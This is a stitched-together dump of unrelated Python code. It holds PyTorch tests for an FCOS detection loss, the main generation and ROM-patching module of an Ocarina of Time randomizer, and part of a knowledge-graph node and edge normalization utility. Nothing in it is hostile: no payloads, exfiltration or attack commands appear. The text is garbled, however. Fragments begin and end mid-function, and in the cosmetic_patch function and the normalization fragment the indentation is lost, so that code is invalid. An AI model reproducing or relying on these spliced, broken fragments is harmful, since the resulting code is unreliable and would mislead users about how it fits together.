def test_assign_boxes_to_level(self, inclusive):
    # FPN-style size intervals: level i handles boxes whose size falls in
    # bounds[i] = (lower, upper]; `inclusive` controls which level(s) claim
    # a box that lands exactly on an interval boundary.
    bounds = (
        (-1, 64),
        (64, 128),
        (128, 256),
        (256, 512),
        (512, 10000000),
    )
    bounds = torch.tensor(bounds)
    batch_size = 2
    # One square box per interval, sized to that interval's upper bound
    # (clamped to 1024), so every box sits exactly on a boundary.
    bbox = (
        torch.tensor([0, 0, 1, 1])
        .unsqueeze_(0)
        .repeat(len(bounds), 1)
        .mul_(bounds[..., 1].unsqueeze(-1))
        .clamp_max_(1024)
    )
    # Prepend a 10x10 box that lies strictly inside the first interval.
    bbox = torch.cat([torch.tensor([0, 0, 10, 10]).unsqueeze_(0), bbox], dim=0)
    bbox = bbox.unsqueeze(0).repeat(batch_size, 1, 1)
    assignments = FCOSLoss.assign_boxes_to_levels(bbox, bounds, inclusive)
    has_assignment = assignments.any(dim=-1)
    assert has_assignment.all(), "one or more boxes was not assigned a level"
    # Expected (num_boxes, num_levels) assignment matrices: a boundary box
    # belongs to the lower interval, the upper interval, or both.
    diag = torch.eye(bbox.shape[-2] - 1, bounds.shape[-2]).bool()
    upper = torch.cat((diag[0:1], diag), dim=-2)
    lower = torch.cat((diag, diag[-1:]), dim=-2)
    both = upper.logical_or(lower)
    if inclusive == "lower":
        expected = lower
    elif inclusive == "upper":
        expected = upper
    elif inclusive == "both":
        expected = both
    else:
        raise ValueError(f"{inclusive}")
    assert (expected == assignments).all()
@pytest.mark.parametrize(
    "stride,center_radius,size_target",
    [
        pytest.param(1, None, (10, 10)),
        pytest.param(2, None, (5, 5)),
        pytest.param(2, 1, (5, 5)),
        pytest.param(2, 10, (10, 10)),
        pytest.param(1, 2, (15, 15)),
        pytest.param(1, None, (10, 15)),
        pytest.param(1, None, (10, 15)),
    ],
)
def test_bbox_to_mask(self, stride, center_radius, size_target):
    # Three test boxes in (x1, y1, x2, y2) absolute coordinates.
    bbox = torch.tensor(
        [
            [0, 0, 9, 9],
            [2, 2, 5, 5],
            [1, 1, 2, 2],
        ]
    )
    result = FCOSLoss.bbox_to_mask(bbox, stride, size_target, center_radius)
    assert isinstance(result, Tensor)
    # One (H, W) mask per box at the strided feature-map resolution.
    assert result.shape == torch.Size([bbox.shape[-2], *size_target])
    for box, res in zip(bbox, result):
        # Box center and half-extents in absolute coordinates.
        center_x = (box[0] + box[2]).true_divide(2)
        center_y = (box[1] + box[3]).true_divide(2)
        radius_x = (box[2] - box[0]).true_divide(2)
        radius_y = (box[3] - box[1]).true_divide(2)
        # Expected positive region: a fixed radius (in stride units) around
        # the center when given, otherwise the whole box ...
        if center_radius is not None:
            x1 = center_x - center_radius * stride
            x2 = center_x + center_radius * stride
            y1 = center_y - center_radius * stride
            y2 = center_y + center_radius * stride
        else:
            x1 = center_x - radius_x
            x2 = center_x + radius_x
            y1 = center_y - radius_y
            y2 = center_y + radius_y
        # ... clipped so the radius never extends past the box itself.
        x1.clamp_min_(center_x - radius_x)
        x2.clamp_max_(center_x + radius_x)
        y1.clamp_min_(center_y - radius_y)
        y2.clamp_max_(center_y + radius_y)
        # Cell-center coordinate grid of the strided feature map.
        h = torch.arange(res.shape[-2], dtype=torch.float, device=box.device)
        w = torch.arange(res.shape[-1], dtype=torch.float, device=box.device)
        mesh = torch.stack(torch.meshgrid(h, w), 0).mul_(stride).add_(stride / 2)
        # NOTE(review): the bounds stack (x, y) while the meshgrid is built
        # as (h, w); the near-symmetric test boxes make the comparison
        # insensitive to the xy/hw order — confirm intended.
        lower_bound = torch.stack([x1, y1]).view(2, 1, 1)
        upper_bound = torch.stack([x2, y2]).view(2, 1, 1)
        mask = (mesh >= lower_bound).logical_and_(mesh <= upper_bound).all(dim=-3)
        pos_region = res[mask]
        # Mask must be non-empty, fully cover the expected region, and have
        # no positives outside it.
        assert res.any()
        assert pos_region.all()
        assert res.sum() - pos_region.sum() == 0
@pytest.mark.parametrize(
    "size_target,stride",
    [
        pytest.param((15, 15), 1),
        pytest.param((10, 10), 2),
        pytest.param((16, 16), 4),
    ],
)
def test_create_regression_target(self, size_target, stride):
    """Check the left/top/right/bottom regression targets at each corner of every box."""
    bbox = torch.tensor(
        [
            [0, 0, 9, 9],
            [2, 3, 8, 7],
        ]
    ).mul_(stride)
    result = FCOSLoss.create_regression_target(bbox, stride, size_target)
    assert isinstance(result, Tensor)
    assert result.shape == torch.Size([bbox.shape[-2], 4, *size_target])
    for box, res in zip(bbox, result):
        h1, w1, h2, w2 = box[1], box[0], box[3], box[2]
        # box corners in grid (stride) coordinates
        hs1 = h1.floor_divide(stride)
        ws1 = w1.floor_divide(stride)
        hs2 = h2.floor_divide(stride)
        ws2 = w2.floor_divide(stride)
        pos_region = res[..., hs1:hs2, ws1:ws2]
        if pos_region.numel():
            assert (pos_region >= 0).all()
            assert pos_region.max() <= box.max()

        def discretize(x):
            # snap to the stride grid, then offset to the cell-center sample point
            return x.float().floor_divide(stride).mul_(stride).add_(stride / 2)

        # left
        assert res[0, hs1, ws1] == stride / 2, "left target at top left corner"
        assert res[0, hs2, ws1] == stride / 2, "left target at bottom left corner"
        assert res[0, hs1, ws2] == discretize(w2 - w1), "left target at top right corner"
        assert res[0, hs2, ws2] == discretize(w2 - w1), "left target at bottom right corner"
        # top
        assert res[1, hs1, ws1] == stride / 2, "top target at top left corner"
        assert res[1, hs2, ws1] == discretize(h2 - h1), "top target at bottom left corner"
        assert res[1, hs1, ws2] == stride / 2, "top target at top right corner"
        assert res[1, hs2, ws2] == discretize(h2 - h1), "top target at bottom right corner"
        # right
        assert res[2, hs1, ws1] == w2 - w1 - stride / 2, "right target at top left corner"
        assert res[2, hs2, ws1] == w2 - w1 - stride / 2, "right target at bottom left corner"
        assert res[2, hs1, ws2] == stride / 2, "right target at top right corner"
        assert res[2, hs2, ws2] == stride / 2, "right target at bottom right corner"
        # bottom (assertion messages previously said "right target" - copy/paste fix)
        assert res[3, hs1, ws1] == h2 - h1 - stride / 2, "bottom target at top left corner"
        assert res[3, hs2, ws1] == stride / 2, "bottom target at bottom left corner"
        assert res[3, hs1, ws2] == h2 - h1 - stride / 2, "bottom target at top right corner"
        assert res[3, hs2, ws2] == stride / 2, "bottom target at bottom right corner"
@pytest.mark.parametrize(
    "stride,center_radius,size_target",
    [
        pytest.param(1, None, (10, 10)),
        pytest.param(1, 1, (15, 15)),
    ],
)
def test_create_classification_target(self, stride, center_radius, size_target):
    """The classification target should be one map per class at the requested size."""
    num_classes = 2
    boxes = torch.tensor(
        [
            [0, 0, 9, 9],
            [3, 4, 8, 6],
            [4, 4, 6, 6],
        ]
    )
    labels = torch.tensor([0, 0, 1]).unsqueeze_(-1)
    # positive-location mask for each box at this stride / radius
    positive_mask = FCOSLoss.bbox_to_mask(boxes, stride, size_target, center_radius)
    target = FCOSLoss.create_classification_target(boxes, labels, positive_mask, num_classes, size_target)
    assert isinstance(target, Tensor)
    assert target.shape == torch.Size([num_classes, *size_target])
@pytest.mark.parametrize(
    "stride,center_radius,size_target",
    [
        pytest.param(1, None, (10, 10)),
        pytest.param(1, 1, (15, 15)),
    ],
)
def test_create_target_for_level(self, stride, center_radius, size_target):
    """Shapes and value ranges of the per-level (cls, reg, centerness) targets."""
    num_classes = 2
    boxes = torch.tensor(
        [
            [0, 0, 9, 9],
            [3, 4, 8, 6],
            [4, 4, 6, 6],
        ]
    )
    labels = torch.tensor([0, 0, 1]).unsqueeze_(-1)
    cls_target, reg_target, centerness_target = FCOSLoss.create_target_for_level(
        boxes, labels, num_classes, stride, size_target, (-1, 64), center_radius
    )
    assert cls_target.shape == torch.Size([num_classes, *size_target])
    assert reg_target.shape == torch.Size([4, *size_target])
    assert centerness_target.shape == torch.Size([1, *size_target])
    # TODO expand on this test
    # centerness is a score no greater than 1, with -1 marking ignored locations
    assert centerness_target.max() <= 1.0
    assert ((centerness_target >= 0) | (centerness_target == -1)).all()
@pytest.mark.parametrize("center_radius", [None, 1])
def test_create_targets(self, center_radius):
    """Smoke test: create_targets runs on a random batch across all FPN levels."""
    # NOTE(review): center_radius is parametrized but unused in the body - confirm intent
    num_classes = 2
    boxes = torch.randint(0, 100, (2, 10, 4))
    labels = torch.randint(0, num_classes, (2, 10, 1))
    strides = (8, 16, 32, 64, 128)
    base_size = 512
    # one square feature map per stride, e.g. 512 // 8 -> (64, 64)
    sizes: Tuple[Tuple[int, int], ...] = tuple((base_size // stride,) * 2 for stride in strides)  # type: ignore
    criterion = FCOSLoss(strides, num_classes)
    criterion.create_targets(boxes, labels, sizes)
def test_compute_loss(self):
    """compute_from_box_target returns three scalar losses that backpropagate."""
    num_classes = 2
    strides = (8, 16, 32, 64, 128)
    base_size = 512
    sizes = [(base_size // stride,) * 2 for stride in strides]
    boxes = torch.tensor(
        [
            [0, 0, 9, 9],
            [3, 4, 8, 6],
            [4, 4, 6, 6],
            [32, 32, 88, 88],
        ]
    )
    labels = torch.tensor([0, 0, 1, 0]).unsqueeze_(-1)
    # random per-level predictions with gradient tracking enabled
    pred_cls = [torch.rand(num_classes, *size, requires_grad=True) for size in sizes]
    pred_reg = [torch.rand(4, *size, requires_grad=True).mul(512).round() for size in sizes]
    pred_centerness = [torch.rand(1, *size, requires_grad=True) for size in sizes]
    criterion = FCOSLoss(strides, num_classes)
    cls_loss, reg_loss, centerness_loss = criterion.compute_from_box_target(
        pred_cls, pred_reg, pred_centerness, boxes, labels
    )
    for partial_loss in (cls_loss, reg_loss, centerness_loss):
        assert isinstance(partial_loss, Tensor)
        assert partial_loss.numel() == 1
    # the combined loss must be differentiable end to end
    total = cls_loss + reg_loss + centerness_loss
    total.backward()
def test_call(self):
    """End-to-end check of the criterion's __call__ on a padded batch."""
    # batch of 3 images with up to 3 boxes each; rows of -1 are padding for
    # images with fewer (or zero) real boxes
    target_bbox = torch.tensor(
        [
            [
                [0, 0, 9, 9],
                [3, 4, 8, 6],
                [-1, -1, -1, -1],
            ],
            [
                [32, 32, 88, 88],
                [-1, -1, -1, -1],
                [-1, -1, -1, -1],
            ],
            [
                [-1, -1, -1, -1],
                [-1, -1, -1, -1],
                [-1, -1, -1, -1],
            ],
        ]
    )
    # class labels aligned with target_bbox; -1 marks padded entries
    target_cls = torch.tensor(
        [
            [0, 1, -1],
            [0, -1, -1],
            [-1, -1, -1],
        ]
    ).unsqueeze_(-1)
    batch_size = target_bbox.shape[0]
    num_classes = 2
    strides = (8, 16, 32, 64, 128)
    base_size = 512
    # one square feature map per stride, e.g. 512 // 8 -> (64, 64)
    sizes = [(base_size // stride,) * 2 for stride in strides]
    # random batched per-level predictions with gradient tracking enabled
    pred_cls = [torch.rand(batch_size, num_classes, *size, requires_grad=True) for size in sizes]
    pred_reg = [torch.rand(batch_size, 4, *size, requires_grad=True).mul(512).round() for size in sizes]
    pred_centerness = [torch.rand(batch_size, 1, *size, requires_grad=True) for size in sizes]
    criterion = FCOSLoss(strides, num_classes)
    cls_loss, reg_loss, centerness_loss = criterion(pred_cls, pred_reg, pred_centerness, target_bbox, target_cls)
    assert isinstance(cls_loss, Tensor)
    assert isinstance(reg_loss, Tensor)
    assert isinstance(centerness_loss, Tensor)
    assert cls_loss.numel() == 1
    assert reg_loss.numel() == 1
    assert centerness_loss.numel() == 1
    loss = cls_loss + reg_loss + centerness_loss
    # losses must stay finite even when the batch contains an all-padding image
    assert not loss.isnan().any()
| |
from collections import OrderedDict
import copy
import hashlib
import io
import itertools
import logging
import os, os.path
import platform
import random
import shutil
import subprocess
import sys
import struct
import time
import zipfile
from World import World
from Spoiler import Spoiler
from Rom import Rom
from Patches import patch_rom
from Cosmetics import patch_cosmetics
from DungeonList import create_dungeons
from Fill import distribute_items_restrictive, ShuffleError
from Item import Item
from ItemPool import generate_itempool
from Hints import buildGossipHints
from Utils import default_output_path, is_bundled, subprocess_args, data_path
from version import __version__
from N64Patch import create_patch_file, apply_patch_file
from SettingsList import setting_infos, logic_tricks
from Rules import set_rules, set_shop_rules
from Plandomizer import Distribution
from Search import Search, RewindableSearch
from EntranceShuffle import set_entrances
from LocationList import set_drop_location_names
class dummy_window():
    """Headless stand-in for the randomizer GUI window.

    Accepts the same update calls as the real window and discards them, so the
    generation code can run unchanged from the command line.
    """

    def __init__(self):
        pass

    def update_status(self, text):
        # status messages are discarded when no GUI is attached
        pass

    def update_progress(self, val):
        # progress values are discarded when no GUI is attached
        pass
def main(settings, window=dummy_window()):
    """Top-level entry point: validate settings, generate a seed (with retries),
    then patch and write the output files.

    :param settings: fully-populated randomizer settings object
    :param window: GUI window (or the no-op dummy_window) for status/progress updates
    """
    start = time.process_time()

    logger = logging.getLogger('')

    old_tricks = settings.allowed_tricks
    settings.load_distribution()

    # compare pointers to lists rather than contents, so even if the two are identical
    # we'll still log the error and note the dist file overrides completely.
    if old_tricks and old_tricks is not settings.allowed_tricks:
        logger.error('Tricks are set in two places! Using only the tricks from the distribution file.')

    # mirror each allowed trick onto the settings object as a boolean attribute
    for trick in logic_tricks.values():
        settings.__dict__[trick['name']] = trick['name'] in settings.allowed_tricks

    # we load the rom before creating the seed so that errors get caught early
    if settings.compress_rom == 'None' and not settings.create_spoiler:
        raise Exception('`No Output` must have spoiler enabled to produce anything.')

    if settings.compress_rom != 'None':
        window.update_status('Loading ROM')
        rom = Rom(settings.rom)
    else:
        rom = None

    if not settings.world_count:
        settings.world_count = 1
    elif settings.world_count < 1 or settings.world_count > 255:
        raise Exception('World Count must be between 1 and 255')

    # Bounds-check the player_num settings, in case something's gone wrong we want to know.
    if settings.player_num < 1:
        raise Exception(f'Invalid player num: {settings.player_num}; must be between (1, {settings.world_count})')
    if settings.player_num > settings.world_count:
        if settings.compress_rom not in ['None', 'Patch']:
            raise Exception(f'Player Num is {settings.player_num}; must be between (1, {settings.world_count})')
        # spoiler/patch-only outputs tolerate an out-of-range player; clamp it
        settings.player_num = settings.world_count

    logger.info('OoT Randomizer Version %s  -  Seed: %s', __version__, settings.seed)
    settings.remove_disabled()
    logger.info('(Original) Settings string: %s\n', settings.settings_string)
    random.seed(settings.numeric_seed)
    settings.resolve_random_settings(cosmetic=False)
    logger.debug(settings.get_settings_display())

    # item shuffling can dead-end; retry with a reset distribution a bounded number of times
    max_attempts = 10
    for attempt in range(1, max_attempts + 1):
        try:
            spoiler = generate(settings, window)
            break
        except ShuffleError as e:
            logger.warning('Failed attempt %d of %d: %s', attempt, max_attempts, e)
            if attempt >= max_attempts:
                raise
            else:
                logger.info('Retrying...\n\n')
                settings.reset_distribution()
    return patch_and_output(settings, window, spoiler, rom, start)
def generate(settings, window):
    """Build all worlds, shuffle entrances and items, and return the Spoiler.

    :param settings: randomizer settings (world_count determines how many worlds)
    :param window: GUI window (or dummy_window) for status/progress updates
    :return: a Spoiler wrapping the fully-populated worlds
    """
    logger = logging.getLogger('')
    worlds = []
    for i in range(0, settings.world_count):
        worlds.append(World(i, settings))

    window.update_status('Creating the Worlds')
    for id, world in enumerate(worlds):
        logger.info('Generating World %d.' % (id + 1))

        window.update_progress(0 + 1*(id + 1)/settings.world_count)
        logger.info('Creating Overworld')
        # glitched logic uses its own region definitions
        if settings.logic_rules == 'glitched':
            overworld_data = os.path.join(data_path('Glitched World'), 'Overworld.json')
        else:
            overworld_data = os.path.join(data_path('World'), 'Overworld.json')

        # Compile the json rules based on settings
        world.load_regions_from_json(overworld_data)
        create_dungeons(world)
        world.create_internal_locations()

        if settings.shopsanity != 'off':
            world.random_shop_prices()
        world.set_scrub_prices()

        window.update_progress(0 + 4*(id + 1)/settings.world_count)
        logger.info('Calculating Access Rules.')
        set_rules(world)

        window.update_progress(0 + 5*(id + 1)/settings.world_count)
        logger.info('Generating Item Pool.')
        generate_itempool(world)
        set_shop_rules(world)
        set_drop_location_names(world)
        world.fill_bosses()

    if settings.triforce_hunt:
        settings.distribution.configure_triforce_hunt(worlds)

    logger.info('Setting Entrances.')
    set_entrances(worlds)

    window.update_status('Placing the Items')
    logger.info('Fill the world.')
    distribute_items_restrictive(window, worlds)
    window.update_progress(35)

    spoiler = Spoiler(worlds)
    if settings.create_spoiler:
        window.update_status('Calculating Spoiler Data')
        logger.info('Calculating playthrough.')
        create_playthrough(spoiler)
        window.update_progress(50)
    # hints need the playthrough-derived data even when no spoiler file is written
    if settings.create_spoiler or settings.hints != 'none':
        window.update_status('Calculating Hint Data')
        logger.info('Calculating hint data.')
        update_required_items(spoiler)
        buildGossipHints(spoiler, worlds)
        window.update_progress(55)
    spoiler.build_file_hash()
    return spoiler
def patch_and_output(settings, window, spoiler, rom, start):
    """Write the requested outputs (patch files, ROMs, logs) for a generated seed.

    :param settings: randomizer settings controlling output type and naming
    :param window: GUI window (or dummy_window) for status/progress updates
    :param spoiler: Spoiler produced by generate(); holds the worlds
    :param rom: loaded base Rom, or None when compress_rom == 'None'
    :param start: process_time() stamp taken at the start of main(), for timing
    :return: the world belonging to settings.player_num
    """
    logger = logging.getLogger('')
    logger.info('Patching ROM.')
    worlds = spoiler.worlds
    cosmetics_log = None

    # short hash of the settings string distinguishes output files of different configs
    settings_string_hash = hashlib.sha1(settings.settings_string.encode('utf-8')).hexdigest().upper()[:5]
    if settings.output_file:
        outfilebase = settings.output_file
    elif settings.world_count > 1:
        outfilebase = 'OoT_%s_%s_W%d' % (settings_string_hash, settings.seed, settings.world_count)
    else:
        outfilebase = 'OoT_%s_%s' % (settings_string_hash, settings.seed)

    output_dir = default_output_path(settings.output_dir)

    if settings.compress_rom == 'Patch':
        # emit one .zpf per world, optionally zipped into a .zpfz archive
        rng_state = random.getstate()
        file_list = []
        window.update_progress(65)
        for world in worlds:
            if settings.world_count > 1:
                window.update_status('Patching ROM: Player %d' % (world.id + 1))
                patchfilename = '%sP%d.zpf' % (outfilebase, world.id + 1)
            else:
                window.update_status('Patching ROM')
                patchfilename = '%s.zpf' % outfilebase

            # every world patches from the same RNG state so cosmetics are reproducible
            random.setstate(rng_state)
            patch_rom(spoiler, world, rom)
            cosmetics_log = patch_cosmetics(settings, rom)
            rom.update_header()

            window.update_progress(65 + 20*(world.id + 1)/settings.world_count)

            window.update_status('Creating Patch File')
            output_path = os.path.join(output_dir, patchfilename)
            file_list.append(patchfilename)
            create_patch_file(rom, output_path)
            # restore the base ROM before patching the next world
            rom.restore()
            window.update_progress(65 + 30*(world.id + 1)/settings.world_count)

            if settings.create_cosmetics_log and cosmetics_log:
                window.update_status('Creating Cosmetics Log')
                if settings.world_count > 1:
                    cosmetics_log_filename = "%sP%d_Cosmetics.txt" % (outfilebase, world.id + 1)
                else:
                    cosmetics_log_filename = '%s_Cosmetics.txt' % outfilebase
                cosmetics_log.to_file(os.path.join(output_dir, cosmetics_log_filename))
                file_list.append(cosmetics_log_filename)
            cosmetics_log = None

        if settings.world_count > 1:
            # bundle the per-player patch files and remove the loose ones
            window.update_status('Creating Patch Archive')
            output_path = os.path.join(output_dir, '%s.zpfz' % outfilebase)
            with zipfile.ZipFile(output_path, mode="w") as patch_archive:
                for file in file_list:
                    file_path = os.path.join(output_dir, file)
                    patch_archive.write(file_path, file.replace(outfilebase, ''), compress_type=zipfile.ZIP_DEFLATED)
            for file in file_list:
                os.remove(os.path.join(output_dir, file))
        logger.info("Created patchfile at: %s" % output_path)
        window.update_progress(95)

    elif settings.compress_rom != 'None':
        # emit a playable ROM for the selected player, optionally compressed
        window.update_status('Patching ROM')
        patch_rom(spoiler, worlds[settings.player_num - 1], rom)
        cosmetics_log = patch_cosmetics(settings, rom)
        window.update_progress(65)

        window.update_status('Saving Uncompressed ROM')
        if settings.world_count > 1:
            filename = "%sP%d.z64" % (outfilebase, settings.player_num)
        else:
            filename = '%s.z64' % outfilebase
        output_path = os.path.join(output_dir, filename)
        rom.write_to_file(output_path)
        if settings.compress_rom == 'True':
            window.update_status('Compressing ROM')
            logger.info('Compressing ROM.')

            if is_bundled():
                compressor_path = "."
            else:
                compressor_path = "Compress"

            # pick the platform-specific compressor binary
            if platform.system() == 'Windows':
                if 8 * struct.calcsize("P") == 64:
                    compressor_path += "\\Compress.exe"
                else:
                    compressor_path += "\\Compress32.exe"
            elif platform.system() == 'Linux':
                if platform.uname()[4] == 'aarch64' or platform.uname()[4] == 'arm64':
                    compressor_path += "/Compress_ARM64"
                else:
                    compressor_path += "/Compress"
            elif platform.system() == 'Darwin':
                compressor_path += "/Compress.out"
            else:
                compressor_path = ""
                logger.info('OS not supported for compression')

            output_compress_path = output_path[:output_path.rfind('.')] + '-comp.z64'
            if compressor_path != "":
                run_process(window, logger, [compressor_path, output_path, output_compress_path])
            # the uncompressed ROM is an intermediate; remove it either way
            os.remove(output_path)
            logger.info("Created compressed rom at: %s" % output_compress_path)
        else:
            logger.info("Created uncompressed rom at: %s" % output_path)
        window.update_progress(95)

    if not settings.create_spoiler or settings.output_settings:
        settings.distribution.update_spoiler(spoiler, False)
        window.update_status('Creating Settings Log')
        settings_path = os.path.join(output_dir, '%s_Settings.json' % outfilebase)
        settings.distribution.to_file(settings_path, False)
        logger.info("Created settings log at: %s" % ('%s_Settings.json' % outfilebase))
    if settings.create_spoiler:
        settings.distribution.update_spoiler(spoiler, True)
        window.update_status('Creating Spoiler Log')
        spoiler_path = os.path.join(output_dir, '%s_Spoiler.json' % outfilebase)
        settings.distribution.to_file(spoiler_path, True)
        logger.info("Created spoiler log at: %s" % ('%s_Spoiler.json' % outfilebase))

    if settings.create_cosmetics_log and cosmetics_log:
        window.update_status('Creating Cosmetics Log')
        if settings.world_count > 1 and not settings.output_file:
            filename = "%sP%d_Cosmetics.txt" % (outfilebase, settings.player_num)
        else:
            filename = '%s_Cosmetics.txt' % outfilebase
        cosmetic_path = os.path.join(output_dir, filename)
        cosmetics_log.to_file(cosmetic_path)
        logger.info("Created cosmetic log at: %s" % cosmetic_path)

    if settings.enable_distribution_file:
        window.update_status('Copying Distribution File')
        try:
            filename = os.path.join(output_dir, '%s_Distribution.json' % outfilebase)
            shutil.copyfile(settings.distribution_file, filename)
            logger.info("Copied distribution file to: %s" % filename)
        except Exception as e:
            # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
            # and hid the cause; the copy remains best-effort but now logs why it failed
            logger.info('Distribution file copy failed: %s', e)

    window.update_progress(100)
    if cosmetics_log and cosmetics_log.error:
        window.update_status('Success: Rom patched successfully. Some cosmetics could not be applied.')
    else:
        window.update_status('Success: Rom patched successfully')

    logger.info('Done. Enjoy.')
    logger.debug('Total Time: %s', time.process_time() - start)

    return worlds[settings.player_num - 1]
def from_patch_file(settings, window=dummy_window()):
    """Apply an existing .zpf/.zpfz patch file to the base ROM and write a playable ROM.

    :param settings: randomizer settings (patch_file, compress_rom, output naming)
    :param window: GUI window (or dummy_window) for status/progress updates
    :return: True on success
    """
    start = time.process_time()
    logger = logging.getLogger('')

    # we load the rom before creating the seed so that error get caught early
    if settings.compress_rom == 'None' or settings.compress_rom == 'Patch':
        raise Exception('Output Type must be a ROM when patching from a patch file.')
    window.update_status('Loading ROM')
    rom = Rom(settings.rom)

    logger.info('Patching ROM.')
    filename_split = os.path.basename(settings.patch_file).split('.')

    if settings.output_file:
        outfilebase = settings.output_file
    else:
        outfilebase = filename_split[0]

    extension = filename_split[-1]

    output_dir = default_output_path(settings.output_dir)
    output_path = os.path.join(output_dir, outfilebase)

    window.update_status('Patching ROM')
    if extension == 'zpf':
        # single-player patch: the file itself is the patch
        subfile = None
    else:
        # .zpfz archive: select this player's patch inside the archive
        subfile = 'P%d.zpf' % (settings.player_num)
        if not settings.output_file:
            output_path += 'P%d' % (settings.player_num)
    apply_patch_file(rom, settings.patch_file, subfile)
    cosmetics_log = None
    if settings.repatch_cosmetics:
        cosmetics_log = patch_cosmetics(settings, rom)

    window.update_progress(65)
    window.update_status('Saving Uncompressed ROM')
    uncompressed_output_path = output_path + '.z64'
    rom.write_to_file(uncompressed_output_path)

    if settings.compress_rom == 'True':
        window.update_status('Compressing ROM')
        logger.info('Compressing ROM.')

        if is_bundled():
            compressor_path = "."
        else:
            compressor_path = "Compress"

        # pick the platform-specific compressor binary
        # NOTE(review): unlike patch_and_output, this branch has no ARM64 case on
        # Linux - confirm whether that is intentional
        if platform.system() == 'Windows':
            if 8 * struct.calcsize("P") == 64:
                compressor_path += "\\Compress.exe"
            else:
                compressor_path += "\\Compress32.exe"
        elif platform.system() == 'Linux':
            compressor_path += "/Compress"
        elif platform.system() == 'Darwin':
            compressor_path += "/Compress.out"
        else:
            compressor_path = ""
            logger.info('OS not supported for compression')

        output_compress_path = output_path + '-comp.z64'
        if compressor_path != "":
            run_process(window, logger, [compressor_path, uncompressed_output_path, output_compress_path])
        # the uncompressed ROM is an intermediate; remove it either way
        os.remove(uncompressed_output_path)
        logger.info("Created compressed rom at: %s" % output_compress_path)
    else:
        logger.info("Created uncompressed rom at: %s" % output_path)
    window.update_progress(95)

    if settings.create_cosmetics_log and cosmetics_log:
        window.update_status('Creating Cosmetics Log')
        if settings.world_count > 1 and not settings.output_file:
            filename = "%sP%d_Cosmetics.txt" % (outfilebase, settings.player_num)
        else:
            filename = '%s_Cosmetics.txt' % outfilebase
        cosmetic_path = os.path.join(output_dir, filename)
        cosmetics_log.to_file(cosmetic_path)
        logger.info("Created cosmetic log at: %s" % cosmetic_path)

    window.update_progress(100)
    if cosmetics_log and cosmetics_log.error:
        window.update_status('Success: Rom patched successfully. Some cosmetics could not be applied.')
    else:
        window.update_status('Success: Rom patched successfully')

    logger.info('Done. Enjoy.')
    logger.debug('Total Time: %s', time.process_time() - start)
    return True
def cosmetic_patch(settings, window=dummy_window()):
start = time.process_time()
logger = logging.getLogger('')
if settings.patch_file == '':
raise Exception('Cosmetic Only must have a patch file supplied.')
window.update_status('Loading ROM')
rom = Rom(settings.rom)
logger.info('Patching ROM.')
filename_split = os.path.basename(settings.patch_file).split('.')
if settings.output_file:
outfilebase = settings.output_file
else:
outfilebase = filename_split[0]
extension = filename_split[-1]
output_dir = default_output_path(settings.output_dir)
| |
normalization_info["equivalent_identifiers"]
}
variant_nodes.append(normalized_node)
# assume we don't have a split and store the id for look up
self.node_normalization_lookup[variant_id] = [normalization_info["id"]]
else:
# otherwise an error occurred
error_for_logs = f'{normalization_info["error_type"]}: {normalization_info["error_message"]}'
self.failed_to_normalize_variant_ids[variant_id] = error_for_logs
if self.strict_normalization:
self.node_normalization_lookup[variant_id] = None
else:
self.node_normalization_lookup[variant_id] = [variant_id]
# TODO for now we dont preserve other properties on variant nodes that didnt normalize
# the splitting makes that complicated and doesnt seem worth it until we have a good use case
fake_normalized_node = {
'id': variant_id,
'name': variant_id,
'category': variant_node_types,
'equivalent_identifiers': []
}
variant_nodes.append(fake_normalized_node)
if len(normalization_response) > 1:
# if we have more than one response here assume its a split variant and no errors
split_ids = [node['id'] for node in normalization_response]
self.variant_node_splits[variant_id] = split_ids
# this will overwrite the previous single IDs stored
self.node_normalization_lookup[variant_id] = split_ids
return variant_nodes
@staticmethod
def get_current_node_norm_version():
    """Return the version string advertised by the node normalization service.

    Reads the 'info.version' field of the service's openapi spec.
    Raises an HTTPError (via raise_for_status) on an error response.
    """
    # the version lives in the 'info' section of the service's openapi spec
    spec_url = 'https://nodenormalization-sri-dev.renci.org/1.1/openapi.json'
    response: requests.models.Response = requests.get(spec_url)
    if response.status_code == 200:
        spec: dict = response.json()
        return spec['info']['version']
    # this shouldn't happen - surface http errors to the caller
    response.raise_for_status()
class EdgeNormalizationResult:
    """Value object holding the outcome of normalizing a single predicate."""

    def __init__(self,
                 identifier: str,
                 label: str,
                 inverted: bool = False):
        # normalized curie for the predicate
        self.identifier = identifier
        # human-readable label for the predicate
        self.label = label
        # whether the predicate's direction was inverted during normalization
        self.inverted = inverted
class EdgeNormUtils:
    """
    Class that contains methods relating to edge normalization of KGX data.

    the input predicate list should be KGX compliant and have the following columns that may be
    changed during the normalization:

        predicate: the name of the predicate
        relation: the biolink label curie
        edge_label: label of the predicate
    """
    def __init__(self, log_level=logging.INFO):
        """
        constructor
        :param log_level - overrides default log level
        """
        # create a logger
        self.logger = LoggingUtil.init_logging("Data_services.Common.EdgeNormUtils", level=log_level, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])

        # normalization map for future look up of all normalized predicates
        self.edge_normalization_lookup = {}

    def normalize_edge_data(self,
                            edge_list: list,
                            cached_edge_norms: dict = None,
                            block_size: int = 2500) -> list:
        """
        This method calls the EdgeNormalization web service to get the normalized identifier and labels.
        the data comes in as a edge list.

        :param edge_list: A list with items to normalize
        :param cached_edge_norms: dict of previously captured normalizations
        :param block_size: the number of curies to process in a single call
        :return: list of relations that failed to normalize
        """
        self.logger.debug(f'Start of normalize_edge_data. items: {len(edge_list)}')

        edge_norm_version = self.get_current_edge_norm_version()

        # init the cache list if it wasn't passed in
        if cached_edge_norms is None:
            cached_edge_norms: dict = {}

        # init the edge index counter
        edge_idx: int = 0

        # save the edge list count to avoid grabbing it over and over
        edge_count: int = len(edge_list)

        # init a set to hold edge relations that have not yet been normed
        tmp_normalize: set = set()

        # iterate through node groups and get only the taxa records.
        while edge_idx < edge_count:
            # check to see if this one needs normalization data from the website
            if not edge_list[edge_idx]['relation'] in cached_edge_norms:
                tmp_normalize.add(edge_list[edge_idx]['relation'])
            else:
                self.logger.debug(f"Cache hit: {edge_list[edge_idx]['relation']}")

            # increment to the next node array element
            edge_idx += 1

        # convert the set to a list so we can iterate through it
        to_normalize: list = list(tmp_normalize)

        # init the array index lower boundary
        start_index: int = 0

        # get the last index of the list
        last_index: int = len(to_normalize)

        self.logger.debug(f'{last_index} unique edges will be normalized.')

        # grab chunks of the data frame
        while True:
            if start_index < last_index:
                # define the end index of the slice
                end_index: int = start_index + block_size

                # force the end index to be the last index to insure no overflow
                if end_index >= last_index:
